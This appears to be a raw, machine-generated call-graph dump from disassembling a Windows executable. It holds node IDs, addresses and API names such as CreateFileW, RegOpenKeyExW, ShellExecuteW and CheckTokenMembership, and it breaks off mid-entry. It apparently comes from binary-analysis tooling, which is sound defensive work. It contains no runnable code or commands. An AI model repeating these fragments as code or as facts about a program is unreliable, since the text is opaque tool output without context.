c4876e 103626 c42b5c 26 API calls _strftime 103609->103626 103611 c486c3 103611->103605 103619 c50d04 103611->103619 103615 c486b8 103612->103615 103622 c3917b 40 API calls 2 library calls 103612->103622 103614 c4870c 103614->103615 103623 c3917b 40 API calls 2 library calls 103614->103623 103615->103611 103625 c3f649 20 API calls __dosmaperr 103615->103625 103617 c4872b 103617->103615 103624 c3917b 40 API calls 2 library calls 103617->103624 103627 c50401 103619->103627 103621 c50d1f 103621->103605 103622->103614 103623->103617 103624->103615 103625->103609 103626->103611 103630 c5040d ___BuildCatchObject 103627->103630 103628 c5041b 103685 c3f649 20 API calls __dosmaperr 103628->103685 103630->103628 103632 c50454 103630->103632 103631 c50420 103686 c42b5c 26 API calls _strftime 103631->103686 103638 c509db 103632->103638 103637 c5042a __fread_nolock 103637->103621 103688 c507af 103638->103688 103641 c50a26 103706 c45594 103641->103706 103642 c50a0d 103720 c3f636 20 API calls __dosmaperr 103642->103720 103645 c50a2b 103646 c50a34 103645->103646 103647 c50a4b 103645->103647 103722 c3f636 20 API calls __dosmaperr 103646->103722 103719 c5071a CreateFileW 103647->103719 103651 c50a39 103723 c3f649 20 API calls __dosmaperr 103651->103723 103652 c50a84 103654 c50b01 GetFileType 103652->103654 103656 c50ad6 GetLastError 103652->103656 103724 c5071a CreateFileW 103652->103724 103655 c50b0c GetLastError 103654->103655 103659 c50b53 103654->103659 103726 c3f613 20 API calls 2 library calls 103655->103726 103725 c3f613 20 API calls 2 library calls 103656->103725 103728 c454dd 21 API calls 3 library calls 103659->103728 103660 c50a12 103721 c3f649 20 API calls __dosmaperr 103660->103721 103661 c50b1a CloseHandle 103661->103660 103663 c50b43 103661->103663 103727 c3f649 20 API calls __dosmaperr 103663->103727 103665 c50ac9 103665->103654 103665->103656 103666 c50b74 103668 c50bc0 103666->103668 103729 c5092b 72 API calls 4 library calls 103666->103729 103673 c50bed 103668->103673 103730 c504cd 72 API calls 4 library calls 103668->103730 103669 c50b48 103669->103660 103672 c50be6 103672->103673 103674 c50bfe 103672->103674 103731 c48a2e 103673->103731 103676 c50478 103674->103676 103677 c50c7c CloseHandle 103674->103677 103687 c504a1 LeaveCriticalSection __wsopen_s 103676->103687 103746 c5071a CreateFileW 103677->103746 103679 c50ca7 103680 c50cb1 GetLastError 103679->103680 103681 c50cdd 103679->103681 103747 c3f613 20 API calls 2 library calls 103680->103747 103681->103676 103683 c50cbd 103748 c456a6 21 API calls 3 library calls 103683->103748 103685->103631 103686->103637 103687->103637 103689 c507ea 103688->103689 103690 c507d0 103688->103690 103749 c5073f 103689->103749 103690->103689 103756 c3f649 20 API calls __dosmaperr 103690->103756 103693 c507df 103757 c42b5c 26 API calls _strftime 103693->103757 103695 c50822 103696 c50851 103695->103696 103758 c3f649 20 API calls __dosmaperr 103695->103758 103705 c508a4 103696->103705 103760 c3da7d 26 API calls 2 library calls 103696->103760 103699 c50846 103759 c42b5c 26 API calls _strftime 103699->103759 103700 c5089f 103701 c5091e 103700->103701 103700->103705 103761 c42b6c 11 API calls _abort 103701->103761 103704 c5092a 103705->103641 103705->103642 103707 c455a0 ___BuildCatchObject 103706->103707 103764 c432d1 EnterCriticalSection 103707->103764 103709 c455a7 103711 c455cc 103709->103711 103715 c4563a EnterCriticalSection 103709->103715 103717 c455ee 103709->103717 103768 c45373 103711->103768 103714 c45617 __fread_nolock 103714->103645 103716 c45647 LeaveCriticalSection 103715->103716 103715->103717 103716->103709 103765 c4569d 103717->103765 103719->103652 103720->103660 103721->103676 103722->103651 103723->103660 103724->103665 103725->103660 103726->103661 103727->103669 103728->103666 103729->103668 103730->103672 103794 c45737 103731->103794 103733 c48a44 103807 c456a6 21 API calls 3 library calls 103733->103807 103734 c48a3e 103734->103733 103736 c45737 __wsopen_s 26 API calls 103734->103736 103745 c48a76 103734->103745 103738 c48a6d 103736->103738 103737 c45737 __wsopen_s 26 API calls 103739 c48a82 CloseHandle 103737->103739 103742 c45737 __wsopen_s 26 API calls 103738->103742 103739->103733 103743 c48a8e GetLastError 103739->103743 103740 c48abe 103740->103676 103741 c48a9c 103741->103740 103808 c3f613 20 API calls 2 library calls 103741->103808 103742->103745 103743->103733 103745->103733 103745->103737 103746->103679 103747->103683 103748->103681 103751 c50757 103749->103751 103750 c50772 103750->103695 103751->103750 103762 c3f649 20 API calls __dosmaperr 103751->103762 103753 c50796 103763 c42b5c 26 API calls _strftime 103753->103763 103755 c507a1 103755->103695 103756->103693 103757->103689 103758->103699 103759->103696 103760->103700 103761->103704 103762->103753 103763->103755 103764->103709 103776 c43319 LeaveCriticalSection 103765->103776 103767 c456a4 103767->103714 103777 c44ff0 103768->103777 103770 c45385 103774 c45392 103770->103774 103784 c43778 11 API calls 2 library calls 103770->103784 103772 c453e4 103772->103717 103775 c454ba EnterCriticalSection 103772->103775 103785 c42d38 103774->103785 103775->103717 103776->103767 103782 c44ffd _abort 103777->103782 103778 c4503d 103792 c3f649 20 API calls __dosmaperr 103778->103792 103779 c45028 RtlAllocateHeap 103780 c4503b 103779->103780 103779->103782 103780->103770 103782->103778 103782->103779 103791 c3521d 7 API calls 2 library calls 103782->103791 103784->103770 103786 c42d6c _free 103785->103786 103787 c42d43 RtlFreeHeap 103785->103787 103786->103772 103787->103786 103788 c42d58 103787->103788 103793 c3f649 20 API calls __dosmaperr 103788->103793 103790 c42d5e GetLastError 103790->103786 103791->103782 103792->103780 103793->103790 103795 c45744 103794->103795 103796 c45759 103794->103796 103809 c3f636 20 API calls __dosmaperr 103795->103809 103800 c4577e 103796->103800 103811 c3f636 20 API calls __dosmaperr 103796->103811 103799 c45749 103810 c3f649 20 API calls __dosmaperr 103799->103810 103800->103734 103801 c45789 103812 c3f649 20 API calls __dosmaperr 103801->103812 103803 c45751 103803->103734 103805 c45791 103813 c42b5c 26 API calls _strftime 103805->103813 103807->103741 103808->103740 103809->103799 103810->103803 103811->103801 103812->103805 103813->103803 104168 c3076b 104169 c30777 ___BuildCatchObject 104168->104169 104198 c30221 104169->104198 104171 c308d1 104236 c30baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 104171->104236 104172 c3077e 104172->104171 104175 c307a8 104172->104175 104174 c308d8 104237 c351c2 28 API calls _abort 104174->104237 104185 c307e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 104175->104185 104209 c427ed 104175->104209 104177 c308de 104238 c35174 28 API calls _abort 104177->104238 104181 c308e6 104182 c307c7 104184 c30848 104217 c30cc9 104184->104217 104185->104184 104232 c3518a 38 API calls 2 library calls 104185->104232 104187 c3084e 104221 c1331b 104187->104221 104192 c3086a 104192->104174 104193 c3086e 104192->104193 104194 c30877 104193->104194 104234 c35165 28 API calls _abort 104193->104234 104235 c303b0 13 API calls 2 library calls 104194->104235 104197 c3087f 104197->104182 104199 c3022a 104198->104199 104239 c30a08 IsProcessorFeaturePresent 104199->104239 104201 c30236 104240 c33004 10 API calls 3 library calls 104201->104240 104203 c3023b 104208 c3023f 104203->104208 104241 c42687 104203->104241 104206 c30256 104206->104172 104208->104172 104210 c42804 104209->104210 104211 c30dfc _ValidateLocalCookies 5 API calls 104210->104211 104212 c307c1 104211->104212 104212->104182 104213 c42791 104212->104213 104214 c427c0 104213->104214 104215 c30dfc _ValidateLocalCookies 5 API calls 104214->104215 104216 c427e9 104215->104216 104216->104185 104292 c326b0 104217->104292 104220 c30cef 104220->104187 104222 c13327 IsThemeActive 104221->104222 104223 c13382 104221->104223 104294 c352b3 104222->104294 104233 c30d02 GetModuleHandleW 104223->104233 104225 c13352 104300 c35319 104225->104300 104227 c13359 104307 c132e6 SystemParametersInfoW SystemParametersInfoW 104227->104307 104229 c13360 104308 c1338b 104229->104308 104231 c13368 SystemParametersInfoW 104231->104223 104232->104184 104233->104192 104234->104194 104235->104197 104236->104174 104237->104177 104238->104181 104239->104201 104240->104203 104245 c4d576 104241->104245 104244 c3302d 8 API calls 3 library calls 104244->104208 104246 c4d593 104245->104246 104247 c4d58f 104245->104247 104246->104247 104251 c44f6e 104246->104251 104263 c30dfc 104247->104263 104249 c30248 104249->104206 104249->104244 104252 c44f7a ___BuildCatchObject 104251->104252 104270 c432d1 EnterCriticalSection 104252->104270 104254 c44f81 104271 c45422 104254->104271 104256 c44f9f 104286 c44fbb LeaveCriticalSection _abort 104256->104286 104257 c44f90 104257->104256 104284 c44e02 29 API calls 104257->104284 104260 c44f9a 104285 c44eb8 GetStdHandle GetFileType 104260->104285 104261 c44fb0 __fread_nolock 104261->104246 104264 c30e07 IsProcessorFeaturePresent 104263->104264 104265 c30e05 104263->104265 104267 c30fce 104264->104267 104265->104249 104291 c30f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 104267->104291 104269 c310b1 104269->104249 104270->104254 104272 c4542e ___BuildCatchObject 104271->104272 104273 c45452 104272->104273 104274 c4543b 104272->104274 104287 c432d1 EnterCriticalSection 104273->104287 104288 c3f649 20 API calls __dosmaperr 104274->104288 104277 c45440 104289 c42b5c 26 API calls _strftime 104277->104289 104279 c4544a __fread_nolock 104279->104257 104280 c4548a 104290 c454b1 LeaveCriticalSection _abort 104280->104290 104282 c45373 __wsopen_s 21 API calls 104283 c4545e 104282->104283 104283->104280 104283->104282 104284->104260 104285->104256 104286->104261 104287->104283 104288->104277 104289->104279 104290->104279 104291->104269 104293 c30cdc GetStartupInfoW 104292->104293 104293->104220 104295 c352bf ___BuildCatchObject 104294->104295 104357 c432d1 EnterCriticalSection 104295->104357 104297 c352ca pre_c_initialization 104358 c3530a 104297->104358 104299 c352ff __fread_nolock 104299->104225 104301 c35325 104300->104301 104302 c3533f 104300->104302 104301->104302 104362 c3f649 20 API calls __dosmaperr 104301->104362 104302->104227 104304 c3532f 104363 c42b5c 26 API calls _strftime 104304->104363 104306 c3533a 104306->104227 104307->104229 104309 c1339b __wsopen_s 104308->104309 104310 c1bf73 8 API calls 104309->104310 104311 c133a7 GetCurrentDirectoryW 104310->104311 104364 c14fd9 104311->104364 104313 c133ce IsDebuggerPresent 104314 c53ca3 MessageBoxA 104313->104314 104315 c133dc 104313->104315 104317 c53cbb 104314->104317 104316 c133f0 104315->104316 104315->104317 104432 c13a95 104316->104432 104468 c14176 8 API calls 104317->104468 104322 c13462 104326 c53cec SetCurrentDirectoryW 104322->104326 104327 c1346a 104322->104327 104326->104327 104328 c13475 104327->104328 104469 c71fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 104327->104469 104464 c134d3 7 API calls 104328->104464 104331 c53d07 104331->104328 104335 c53d19 104331->104335 104334 c1347f 104337 c1396b 60 API calls 104334->104337 104341 c13494 104334->104341 104336 c15594 10 API calls 104335->104336 104338 c53d22 104336->104338 104337->104341 104339 c1b329 8 API calls 104338->104339 104340 c53d30 104339->104340 104343 c53d5f 104340->104343 104344 c53d38 104340->104344 104342 c134af 104341->104342 104345 c13907 Shell_NotifyIconW 104341->104345 104348 c134b6 SetCurrentDirectoryW 104342->104348 104347 c16b7c 8 API calls 104343->104347 104346 c16b7c 8 API calls 104344->104346 104345->104342 104349 c53d43 104346->104349 104350 c53d5b GetForegroundWindow ShellExecuteW 104347->104350 104351 c134ca 104348->104351 104352 c17bb5 8 API calls 104349->104352 104355 c53d90 104350->104355 104351->104231 104354 c53d51 104352->104354 104356 c16b7c 8 API calls 104354->104356 104355->104342 104356->104350 104357->104297 104361 c43319 LeaveCriticalSection 104358->104361 104360 c35311 104360->104299 104361->104360 104362->104304 104363->104306 104365 c1bf73 8 API calls 104364->104365 104366 c14fef 104365->104366 104470 c163d7 104366->104470 104368 c1500d 104369 c1bd57 8 API calls 104368->104369 104370 c15021 104369->104370 104371 c1bed9 8 API calls 104370->104371 104372 c1502c 104371->104372 104373 c1893c 8 API calls 104372->104373 104374 c15038 104373->104374 104375 c1b329 8 API calls 104374->104375 104376 c15045 104375->104376 104377 c1be2d 39 API calls 104376->104377 104378 c15055 104377->104378 104379 c1b329 8 API calls 104378->104379 104380 c1507b 104379->104380 104381 c1be2d 39 API calls 104380->104381 104382 c1508a 104381->104382 104383 c1bf73 8 API calls 104382->104383 104384 c150a8 104383->104384 104484 c151ca 104384->104484 104387 c34d98 _strftime 40 API calls 104388 c150c2 104387->104388 104389 c54b23 104388->104389 104390 c150cc 104388->104390 104391 c151ca 8 API calls 104389->104391 104392 c34d98 _strftime 40 API calls 104390->104392 104393 c54b37 104391->104393 104394 c150d7 104392->104394 104397 c151ca 8 API calls 104393->104397 104394->104393 104395 c150e1 104394->104395 104396 c34d98 _strftime 40 API calls 104395->104396 104398 c150ec 104396->104398 104399 c54b53 104397->104399 104398->104399 104400 c150f6 104398->104400 104402 c15594 10 API calls 104399->104402 104401 c34d98 _strftime 40 API calls 104400->104401 104403 c15101 104401->104403 104404 c54b76 104402->104404 104405 c54b9f 104403->104405 104406 c1510b 104403->104406 104407 c151ca 8 API calls 104404->104407 104410 c151ca 8 API calls 104405->104410 104409 c1512e 104406->104409 104412 c1bed9 8 API calls 104406->104412 104408 c54b82 104407->104408 104411 c1bed9 8 API calls 104408->104411 104414 c54bda 104409->104414 104418 c17e12 8 API calls 104409->104418 104413 c54bbd 104410->104413 104415 c54b90 104411->104415 104416 c15121 104412->104416 104417 c1bed9 8 API calls 104413->104417 104419 c151ca 8 API calls 104415->104419 104420 c151ca 8 API calls 104416->104420 104421 c54bcb 104417->104421 104422 c1513e 104418->104422 104419->104405 104420->104409 104423 c151ca 8 API calls 104421->104423 104424 c18470 8 API calls 104422->104424 104423->104414 104425 c1514c 104424->104425 104426 c18a60 8 API calls 104425->104426 104429 c15167 104426->104429 104427 c1893c 8 API calls 104427->104429 104428 c18a60 8 API calls 104428->104429 104429->104427 104429->104428 104430 c151ab 104429->104430 104431 c151ca 8 API calls 104429->104431 104430->104313 104431->104429 104433 c13aa2 __wsopen_s 104432->104433 104434 c13abb 104433->104434 104435 c540da ___scrt_fastfail 104433->104435 104436 c15851 9 API calls 104434->104436 104437 c540f6 GetOpenFileNameW 104435->104437 104438 c13ac4 104436->104438 104439 c54145 104437->104439 104490 c13a57 104438->104490 104441 c18577 8 API calls 104439->104441 104443 c5415a 104441->104443 104443->104443 104445 c13ad9 104508 c162d5 104445->104508 105125 c13624 7 API calls 104464->105125 104466 c1347a 104467 c135b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104466->104467 104467->104334 104468->104322 104469->104331 104471 c163e4 __wsopen_s 104470->104471 104472 c18577 8 API calls 104471->104472 104473 c16416 104471->104473 104472->104473 104474 c1655e 8 API calls 104473->104474 104481 c1644c 104473->104481 104474->104473 104475 c1651a 104476 c1b329 8 API calls 104475->104476 104482 c1654f 104475->104482 104477 c16543 104476->104477 104480 c16a7c 8 API calls 104477->104480 104478 c1b329 8 API calls 104478->104481 104479 c1655e 8 API calls 104479->104481 104480->104482 104481->104475 104481->104478 104481->104479 104483 c16a7c 8 API calls 104481->104483 104482->104368 104483->104481 104485 c151f2 104484->104485 104486 c151d4 104484->104486 104487 c18577 8 API calls 104485->104487 104488 c150b4 104486->104488 104489 c1bed9 8 API calls 104486->104489 104487->104488 104488->104387 104489->104488 104491 c522d0 __wsopen_s 104490->104491 104492 c13a64 GetLongPathNameW 104491->104492 104493 c18577 8 API calls 104492->104493 104494 c13a8c 104493->104494 104495 c153f2 104494->104495 104496 c1bf73 8 API calls 104495->104496 104497 c15404 104496->104497 104498 c15851 9 API calls 104497->104498 104499 c1540f 104498->104499 104500 c1541a 104499->104500 104504 c54d5b 104499->104504 104501 c16a7c 8 API calls 104500->104501 104503 c15426 104501->104503 104538 c11340 104503->104538 104506 c54d7d 104504->104506 104544 c2e36b 41 API calls 104504->104544 104507 c15439 104507->104445 104545 c16679 104508->104545 104539 c11352 104538->104539 104543 c11371 __fread_nolock 104538->104543 104542 c3017b 8 API calls 104539->104542 104540 c3014b 8 API calls 104541 c11388 104540->104541 104541->104507 104542->104543 104543->104540 104544->104504 104724 c1663e LoadLibraryA 104545->104724 104550 c166a4 LoadLibraryExW 104732 c16607 LoadLibraryA 104550->104732 104551 c55648 104552 c166e7 68 API calls 104551->104552 104554 c5564f 104552->104554 104557 c16607 3 API calls 104554->104557 104559 c55657 104557->104559 104753 c1684a 104559->104753 104725 c16674 104724->104725 104726 c16656 GetProcAddress 104724->104726 104729 c3e95b 104725->104729 104727 c16666 104726->104727 104727->104725 104728 c1666d FreeLibrary 104727->104728 104728->104725 104761 c3e89a 104729->104761 104731 c16698 104731->104550 104731->104551 104733 c1663b 104732->104733 104734 c1661c GetProcAddress 104732->104734 104737 c16720 104733->104737 104735 c1662c 104734->104735 104735->104733 104736 c16634 FreeLibrary 104735->104736 104736->104733 104738 c3017b 8 API calls 104737->104738 104739 c16735 104738->104739 104740 c1423c 8 API calls 104739->104740 104742 c16741 __fread_nolock 104740->104742 104741 c556c2 104819 c83a92 74 API calls 104741->104819 104742->104741 104746 c1677c 104742->104746 104818 c83a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 104742->104818 104745 c1684a 40 API calls 104745->104746 104746->104745 104747 c55706 104746->104747 104748 c16874 64 API calls 104746->104748 104750 c16810 messages 104746->104750 104813 c16874 104747->104813 104748->104746 104754 c1685c 104753->104754 104757 c55760 104753->104757 104851 c3ec34 104754->104851 104762 c3e8a6 ___BuildCatchObject 104761->104762 104763 c3e8b4 104762->104763 104766 c3e8e4 104762->104766 104786 c3f649 20 API calls __dosmaperr 104763->104786 104765 c3e8b9 104787 c42b5c 26 API calls _strftime 104765->104787 104768 c3e8f6 104766->104768 104769 c3e8e9 104766->104769 104778 c483e1 104768->104778 104788 c3f649 20 API calls __dosmaperr 104769->104788 104772 c3e8ff 104773 c3e912 104772->104773 104774 c3e905 104772->104774 104790 c3e944 LeaveCriticalSection __fread_nolock 104773->104790 104789 c3f649 20 API calls __dosmaperr 104774->104789 104776 c3e8c4 __fread_nolock 104776->104731 104779 c483ed ___BuildCatchObject 104778->104779 104791 c432d1 EnterCriticalSection 104779->104791 104781 c483fb 104792 c4847b 104781->104792 104785 c4842c __fread_nolock 104785->104772 104786->104765 104787->104776 104788->104776 104789->104776 104790->104776 104791->104781 104799 c4849e 104792->104799 104793 c484f7 104794 c44ff0 _abort 20 API calls 104793->104794 104795 c48500 104794->104795 104797 c42d38 _free 20 API calls 104795->104797 104798 c48509 104797->104798 104804 c48408 104798->104804 104810 c43778 11 API calls 2 library calls 104798->104810 104799->104793 104799->104799 104799->104804 104808 c394fd EnterCriticalSection 104799->104808 104809 c39511 LeaveCriticalSection 104799->104809 104801 c48528 104811 c394fd EnterCriticalSection 104801->104811 104805 c48437 104804->104805 104812 c43319 LeaveCriticalSection 104805->104812 104807 c4843e 104807->104785 104808->104799 104809->104799 104810->104801 104811->104804 104812->104807 104818->104741 104819->104746 104854 c3ec51 104851->104854 104855 c3ec5d ___BuildCatchObject 104854->104855 104856 c3ec70 ___scrt_fastfail 104855->104856 104857 c3ec9d 104855->104857 104858 c3ec95 __fread_nolock 104855->104858 105125->104466 103814 c6400f 103815 c1eeb0 messages 103814->103815 103816 c1f211 PeekMessageW 103815->103816 103817 c1ef07 GetInputState 103815->103817 103818 c1f0d5 103815->103818 103820 c632cd TranslateAcceleratorW 103815->103820 103821 c1f28f PeekMessageW 103815->103821 103822 c1f104 timeGetTime 103815->103822 103823 c1f273 TranslateMessage DispatchMessageW 103815->103823 103824 c1f2af Sleep 103815->103824 103825 c64183 Sleep 103815->103825 103826 c633e9 timeGetTime 103815->103826 103842 c20340 207 API calls 103815->103842 103844 c22b20 207 API calls 103815->103844 103846 c1f450 103815->103846 103853 c1f6d0 103815->103853 103876 c2e915 103815->103876 103882 c8446f 8 API calls 103815->103882 103883 c83fe1 81 API calls __wsopen_s 103815->103883 103816->103815 103817->103815 103817->103816 103820->103815 103821->103815 103822->103815 103823->103821 103843 c1f2c0 103824->103843 103825->103843 103881 c2aa65 9 API calls 103826->103881 103827 c2f215 timeGetTime 103827->103843 103828 c7dd87 46 API calls 103828->103843 103830 c6421a GetExitCodeProcess 103832 c64246 CloseHandle 103830->103832 103833 c64230 WaitForSingleObject 103830->103833 103831 c63d51 103836 c63d59 103831->103836 103832->103843 103833->103815 103833->103832 103834 ca345b GetForegroundWindow 103834->103843 103837 c642b8 Sleep 103837->103815 103842->103815 103843->103815 103843->103827 103843->103828 103843->103830 103843->103831 103843->103834 103843->103837 103884 c960b5 8 API calls 103843->103884 103885 c7f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103843->103885 103844->103815 103847 c1f46f 103846->103847 103848 c1f483 103846->103848 103886 c1e960 103847->103886 103918 c83fe1 81 API calls __wsopen_s 103848->103918 103850 c1f47a 103850->103815 103852 c64584 103852->103852 103854 c1f710 103853->103854 103861 c1f7dc messages 103854->103861 103939 c305b2 5 API calls __Init_thread_wait 103854->103939 103855 c20340 207 API calls 103855->103861 103857 c83fe1 81 API calls 103857->103861 103859 c645d9 103859->103861 103862 c1bf73 8 API calls 103859->103862 103860 c1bf73 8 API calls 103860->103861 103861->103855 103861->103857 103861->103860 103871 c1bed9 8 API calls 103861->103871 103872 c1fae1 103861->103872 103873 c21ca0 8 API calls 103861->103873 103934 c1be2d 103861->103934 103938 c2b35c 207 API calls 103861->103938 103942 c305b2 5 API calls __Init_thread_wait 103861->103942 103943 c30413 29 API calls __onexit 103861->103943 103944 c30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103861->103944 103945 c95231 101 API calls 103861->103945 103946 c9731e 207 API calls 103861->103946 103863 c645f3 103862->103863 103940 c30413 29 API calls __onexit 103863->103940 103867 c645fd 103941 c30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103867->103941 103871->103861 103872->103815 103873->103861 103877 c2e959 103876->103877 103878 c2e928 103876->103878 103877->103815 103878->103877 103879 c2e94c IsDialogMessageW 103878->103879 103880 c6eff6 GetClassLongW 103878->103880 103879->103877 103879->103878 103880->103878 103880->103879 103881->103815 103882->103815 103883->103815 103884->103843 103885->103843 103887 c20340 207 API calls 103886->103887 103903 c1e99d 103887->103903 103888 c631d3 103932 c83fe1 81 API calls __wsopen_s 103888->103932 103890 c1ea0b messages 103890->103850 103891 c1edd5 103891->103890 103901 c3017b 8 API calls 103891->103901 103892 c1eac3 103892->103891 103894 c1eace 103892->103894 103893 c1ecff 103896 c631c4 103893->103896 103897 c1ed14 103893->103897 103895 c3014b 8 API calls 103894->103895 103906 c1ead5 __fread_nolock 103895->103906 103931 c96162 8 API calls 103896->103931 103900 c3014b 8 API calls 103897->103900 103898 c1ebb8 103902 c3017b 8 API calls 103898->103902 103911 c1eb6a 103900->103911 103901->103906 103908 c1eb29 __fread_nolock messages 103902->103908 103903->103888 103903->103890 103903->103891 103903->103892 103903->103898 103907 c3014b 8 API calls 103903->103907 103903->103908 103904 c3014b 8 API calls 103905 c1eaf6 103904->103905 103905->103908 103919 c1d260 103905->103919 103906->103904 103906->103905 103907->103903 103908->103893 103910 c631b3 103908->103910 103908->103911 103914 c6318e 103908->103914 103916 c6316c 103908->103916 103927 c144fe 207 API calls 103908->103927 103930 c83fe1 81 API calls __wsopen_s 103910->103930 103911->103850 103929 c83fe1 81 API calls __wsopen_s 103914->103929 103928 c83fe1 81 API calls __wsopen_s 103916->103928 103918->103852 103920 c1d2c6 103919->103920 103921 c1d29a 103919->103921 103923 c20340 207 API calls 103920->103923 103922 c1f6d0 207 API calls 103921->103922 103925 c1d2a0 103921->103925 103922->103925 103924 c6184b 103923->103924 103924->103925 103933 c83fe1 81 API calls __wsopen_s 103924->103933 103925->103908 103927->103908 103928->103911 103929->103911 103930->103911 103931->103888 103932->103890 103933->103925 103935 c1be38 103934->103935 103936 c1be67 103935->103936 103947 c1bfa5 103935->103947 103936->103861 103938->103861 103939->103859 103940->103867 103941->103861 103942->103861 103943->103861 103944->103861 103945->103861 103946->103861 103964 c1cf80 103947->103964 103949 c1bfb5 103950 c60db6 103949->103950 103951 c1bfc3 103949->103951 103953 c1b4c8 8 API calls 103950->103953 103952 c3014b 8 API calls 103951->103952 103955 c1bfd4 103952->103955 103954 c60dc1 103953->103954 103956 c1bf73 8 API calls 103955->103956 103957 c1bfde 103956->103957 103958 c1bfed 103957->103958 103959 c1bed9 8 API calls 103957->103959 103960 c3014b 8 API calls 103958->103960 103959->103958 103961 c1bff7 103960->103961 103972 c1be7b 39 API calls 103961->103972 103963 c1c01b 103963->103936 103965 c1d1c7 103964->103965 103970 c1cf93 103964->103970 103965->103949 103967 c1d03d 103967->103949 103968 c1bf73 8 API calls 103968->103970 103970->103967 103970->103968 103973 c305b2 5 API calls __Init_thread_wait 103970->103973 103974 c30413 29 API calls __onexit 103970->103974 103975 c30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103970->103975 103972->103963 103973->103970 103974->103970 103975->103970 103976 c1da4a 103977 c1da54 103976->103977 103987 c1dbc4 103976->103987 103978 c1cf80 39 API calls 103977->103978 103977->103987 103979 c1dace 103978->103979 103980 c3014b 8 API calls 103979->103980 103981 c1dae7 103980->103981 103982 c3017b 8 API calls 103981->103982 103983 c1db05 103982->103983 103984 c3014b 8 API calls 103983->103984 103986 c1db16 __fread_nolock 103984->103986 103985 c3014b 8 API calls 103989 c1db7f 103985->103989 103986->103985 103986->103987 103988 c3017b 8 API calls 103987->103988 103990 c1d5e1 103987->103990 103993 c1dc19 103987->103993 103988->103987 103989->103987 103991 c1cf80 39 API calls 103989->103991 103992 c3014b 8 API calls 103990->103992 103991->103987 103998 c1d66e messages 103992->103998 103994 c1c3ab 8 API calls 104004 c1d9ac messages 103994->104004 103995 c1b4c8 8 API calls 103995->103998 103997 c61f79 104007 c756ae 8 API calls messages 103997->104007 103998->103995 103998->103997 104000 c61f94 103998->104000 104001 c1bed9 8 API calls 103998->104001 104002 c1c3ab 8 API calls 103998->104002 104003 c1d911 messages 103998->104003 104001->103998 104002->103998 104003->103994 104003->104004 104005 c1d9c3 104004->104005 104006 c2e30a 8 API calls messages 104004->104006 104006->104004 104007->104000 105126 c3f06e 105127 c3f07a ___BuildCatchObject 105126->105127 105128 c3f086 105127->105128 105129 c3f09b 105127->105129 105145 c3f649 20 API calls __dosmaperr 105128->105145 105139 c394fd EnterCriticalSection 105129->105139 105132 c3f08b 105146 c42b5c 26 API calls _strftime 105132->105146 105133 c3f0a7 105140 c3f0db 105133->105140 105138 c3f096 __fread_nolock 105139->105133 105148 c3f106 105140->105148 105142 c3f0e8 105143 c3f0b4 105142->105143 105168 c3f649 20 API calls __dosmaperr 105142->105168 105147 c3f0d1 LeaveCriticalSection __fread_nolock 105143->105147 105145->105132 105146->105138 105147->105138 105149 c3f114 105148->105149 105150 c3f12e 105148->105150 105172 c3f649 20 API calls __dosmaperr 105149->105172 105151 c3dcc5 __fread_nolock 26 API calls 105150->105151 105153 c3f137 105151->105153 105169 c49789 105153->105169 105154 c3f119 105173 c42b5c 26 API calls _strftime 105154->105173 105158 c3f23b 105160 c3f248 105158->105160 105164 c3f1ee 105158->105164 105159 c3f1bf 105162 c3f1dc 105159->105162 105159->105164 105175 c3f649 20 API calls __dosmaperr 105160->105175 105174 c3f41f 31 API calls 4 library calls 105162->105174 105165 c3f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 105164->105165 105176 c3f29b 30 API calls 2 library calls 105164->105176 105165->105142 105166 c3f1e6 105166->105165 105168->105143 105177 c49606 105169->105177 105171 c3f153 105171->105158 105171->105159 105171->105165 105172->105154 105173->105165 105174->105166 105175->105165 105176->105165 105178 c49612 ___BuildCatchObject 105177->105178 105179 c4961a 105178->105179 105182 c49632 105178->105182 105212 c3f636 20 API calls __dosmaperr 105179->105212 105181 c496e6 105217 c3f636 20 API calls __dosmaperr 105181->105217 105182->105181 105187 c4966a 105182->105187 105183 c4961f 105213 c3f649 20 API calls __dosmaperr 105183->105213 105186 c496eb 105218 c3f649 20 API calls __dosmaperr 105186->105218 105202 c454ba EnterCriticalSection 105187->105202 105190 c496f3 105219 c42b5c 26 API calls _strftime 105190->105219 105191 c49670 105193 c49694 105191->105193 105194 c496a9 105191->105194 105214 c3f649 20 API calls __dosmaperr 105193->105214 105203 c4970b 105194->105203 105196 c49627 __fread_nolock 105196->105171 105198 c49699 105215 c3f636 20 API calls __dosmaperr 105198->105215 105199 c496a4 105216 c496de LeaveCriticalSection __wsopen_s 105199->105216 105202->105191 105204 c45737 __wsopen_s 26 API calls 105203->105204 105205 c4971d 105204->105205 105206 c49725 105205->105206 105207 c49736 SetFilePointerEx 105205->105207 105220 c3f649 20 API calls __dosmaperr 105206->105220 105209 c4972a 105207->105209 105210 c4974e GetLastError 105207->105210 105209->105199 105221 c3f613 20 API calls 2 library calls 105210->105221 105212->105183 105213->105196 105214->105198 105215->105199 105216->105196 105217->105186 105218->105190 105219->105196 105220->105209 105221->105209 105222 c11033 105227 c168b4 105222->105227 105226 c11042 105228 c1bf73 8 API calls 105227->105228 105229 c16922 105228->105229 105235 c1589f 105229->105235 105231 c169bf 105232 c11038 105231->105232 105238 c16b14 8 API calls __fread_nolock 105231->105238 105234 c30413 29 API calls __onexit 105232->105234 105234->105226 105239 c158cb 105235->105239 105238->105231 105240 c158be 105239->105240 105241 c158d8 105239->105241 105240->105231 105241->105240 105242 c158df RegOpenKeyExW 105241->105242 105242->105240 105243 c158f9 RegQueryValueExW 105242->105243 105244 c1591a 105243->105244 105245 c1592f RegCloseKey 105243->105245 105244->105245 105245->105240 104008 c66555 104009 c3014b 8 API calls 104008->104009 104010 c6655c 104009->104010 104011 c3017b 8 API calls 104010->104011 104013 c66575 __fread_nolock 104010->104013 104011->104013 104012 c3017b 8 API calls 104014 